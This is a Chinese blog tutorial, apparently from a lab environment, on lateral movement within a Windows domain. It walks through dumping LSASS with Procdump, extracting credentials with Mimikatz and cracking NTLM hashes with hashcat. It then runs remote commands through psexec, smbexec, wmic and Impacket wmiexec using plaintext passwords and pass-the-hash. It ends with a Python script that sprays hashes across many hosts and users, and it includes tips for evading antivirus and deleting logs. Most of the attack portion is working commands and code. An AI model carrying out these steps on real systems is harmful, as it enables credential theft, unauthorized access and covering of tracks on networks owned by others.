内网渗透-域横向smb&wmin明文hash传递

Procdump+Mimikatz配合获取明文hash

该工具可配合minikatz进行明文获取,minikatz被查杀的情况下可使用

tips:该工具为微软官方工具,不会被查杀

Procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

下载成功后 导入到目标主机
在这里插入图片描述

使用CMD命令进行以下命令进行执行

即使用该工具生成一个该主机的密码文件

procdump -accepteula -ma lsass.exe lsass.dmp

在这里插入图片描述

执行成功,自动生成了一个lsass.dmp的文件
在这里插入图片描述

将该dmp文件放到自己本机上使用minikatz进行执行

tips:将dmp文件放进minikatz同级目录下
在这里插入图片描述

在自己本机上打开minikatz,输入以下两条命令进行执行

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

在这里插入图片描述
可以看到密码全部跑出来了
在这里插入图片描述

Hashcat破解获取Windows NTML Hash

下载链接:https://github.com/hashcat/hashcat/releases/tag/v6.2.5
参考:https://www.freebuf.com/sectool/164507.html

hashcat -a 0 -m 1000 hash file --force

使用该命令进行hash破解

域横向移动SMB445服务利用

psexec/smbexec(官方自带工具)

利用SMB服务可以通过明文或hash传递来远程执行命令,条件是445服务端口开放

Tips:基于开放了445端口的主机

Psexec/PsTool

下载连接:https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

第一种:先有IPC连接,Psexec需要明文或hash传递

执行以下连接命令

net use \\192.168.3.32\ipc$ "admin!@#45" /user:administrator

进入Pstool目录下,执行该条命令进行执行 -s 以System权限进行运行

psexec \\192.168.3.32 -s cmd

成功执行命令,类似反弹shell
在这里插入图片描述
第二种:不用建立IPC连接,直接提供明文账户密码

进入Pstool目录下,执行该命令

psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd 

在这里插入图片描述

不用连接IPC 直接提供账户密码直接连接

使用hash值进行连接结合atexec工具

psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 
psexec -hashes :$HASH$ ./administrator@10.1.2.3
psexec -hashes :$HASH$ domain/administrator@10.1.2.3

在这里插入图片描述
官方Pstools无法采用hash连接

tips:./为连接当前主机用户,god/administrator,为连接域内用户

Impacket

非官方自带-参考impacket工具包使用,操作简单,容易被杀

Smbexec,无需先IPC连接,明文或hash传递

也是基于atexec进行命令执行

smbexec god/administrator:Admin12345@192.168.3.21

在这里插入图片描述
tips:./为连接本地用户,god/为连接域内用户

连接192.168.3.32本地用户

smbexec ./administrator:admin!@#45@192.168.3.32

在这里插入图片描述
hash传递,与上同理

smbexec -hashes :$HASH$ ./admin@192.168.3.21
smbbexec -hashes :$HASH$ domain/admin@192.168.3.21
smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
smbexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21

在这里插入图片描述
tips:该连接方法会存留日志,注意删除

域横向移动WMI135服务利用

cscript,wmiexec,wmic

WMI(Windows Management Instrumentation) 是通过135端口进行利用,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。

tips:基于开放了135端口的主机

WMIC

WMI(Windows Management Instrumentation) 是通过135端口进行利用,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。

Windows自带命令,不会被杀毒软件查杀,明文传输,没有回显,该自带命令无回显,查看执行结果需要指定盘符

tips:前提需要知道账号密码,而且135端口开放

wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c  ipconfig >C:\1.txt"

在这里插入图片描述

执行成功,查看该文件内容
在这里插入图片描述
在这里插入图片描述

自带csript

需要下载个vbs脚本进行执行,明文传递(需要知道账号密码),有回显(类似反弹shell)

vbs找不到链接了,fack,用法如下:

cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

套件Impacket/wmiexec

明文或hash传递,有回显exe版本,容易被查杀

wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"

在这里插入图片描述

wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"

在这里插入图片描述
hash连接

wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"

在这里插入图片描述

域横向移动以上服务hash批量利用

前期获取到web权限后信息收集到明文/hash,批量进行利用

hash批量利用-python编译exe

tips:真实环境中ip/域用户/hash值等自行收集,再进行打包成exe

需要将该exe放进Impacket目录下,该脚本调用了wmiexec
在这里插入图片描述

源码

import os,time
ips={
    '192.168.3.21',
    '192.168.3.25',
    '192.168.3.29',
    '192.168.3.30',
    '192.168.3.32'
}
users={
    'Administrator',
    'boss',
    'dbadmin',
    'fileadmin',
    'mack',
    'mary',
    'webadmin'
    '域内用户xxx'
    'xxx'
    'xxx'
}
hashs={
    'ccef208c6485269c20db2cad21734fe7',
    '518b98ad4178a53695dc997aa02d455c'
}

for ip in ips:
    for user in users:
        for mimahash in hashs:
            #wmiexec -hashes :hash god/user@ip whoami
            exec = "wmiexec -hashes :"+mimahash+" god/"+user+"@"+ip+" whoami"
            execc = "wmiexec -hashes :"+mimahash+" ./"+user+"@"+ip+" whoami"
            print('--->' + exec + '<---')
            print('--->' + execc + '<---')
            os.system(exec)
            os.system(execc)
            time.sleep(0.5)

代码可自由编辑,以上脚本批量跑了域内用户和本地用户,user里面可以继续添加域用户账户名
在这里插入图片描述
使用pyinstaller进行打包成exe

pyinstaller -F xxx.py

在这里插入图片描述
执行,等待爆破结果
在这里插入图片描述
已经有结果了,成功利用hash值爆破出192.168.3.21/DC该主机,并且可执行命令
在这里插入图片描述

总结

在这里插入图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ranwu0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值